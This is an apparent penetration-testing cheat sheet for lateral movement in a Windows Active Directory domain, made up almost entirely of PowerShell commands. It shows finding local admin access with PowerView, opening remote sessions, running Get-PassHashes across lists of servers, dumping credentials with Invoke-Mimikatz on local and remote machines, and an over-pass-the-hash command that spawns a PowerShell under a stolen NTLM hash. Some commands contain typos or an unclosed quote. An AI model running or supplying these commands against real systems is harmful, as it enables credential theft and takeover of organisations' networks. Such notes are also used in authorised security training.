Lateral Movement

PowerView

..\PowerView


#Find where you have localadminacces
Find-LocalAdminAccess


#Start Powershell Session on Server
Enter-PSSession -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS>
whoami
whoami /priv
hostname


#Use different credentials:
Enter-PSSession -Credential <username> <password> -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS>


#Create statefull Session
$sess = Enter-PSSession -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS>
#see the session
$sess
#Enter the session
Enter-PSSession -Session $sess
#Exit the session
exit

Executing Commands Remotely

#Excute command on remote target with LocalAdminAccess
Invoke-Comman -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS> -ScriptBlock{whoami;hostname}
Invoke-Comman -ComputerName <FQDN OF SERVER WITH AMDIN ACCESS> -ScriptBlock{Get-Process}


#Excute Scripts from Files
Invoke-Command –FilePath C:\scripts\Get-PassHashes.ps1 -ComputerName (Get-Content <list_of_servers>)


#Use below to execute locally loaded function on the remote machines:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)


#In this case, we are passing Arguments. Keep in mind that only positional arguments could be passed this way:
Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList


Use below to execute "Stateful" commands using Invoke-Command :
$Sess = New-PSSession –Computername Server1 
Invoke-Command –Session $Sess –ScriptBlock {$Proc = Get-Process} 
Invoke-Command –Session $Sess –ScriptBlock {$Proc.Name}

Invoke-Mimikatz

#Dump credentials on a local machine.
Invoke-Mimikatz -DumpCreds


#Dump credentials on multiple remote machines.
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")


#Invoke-Mimikatz uses PowerShell remoting cmdlet Invoke-Command to
do above.


Over pass the hash" generate tokens from hashes.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"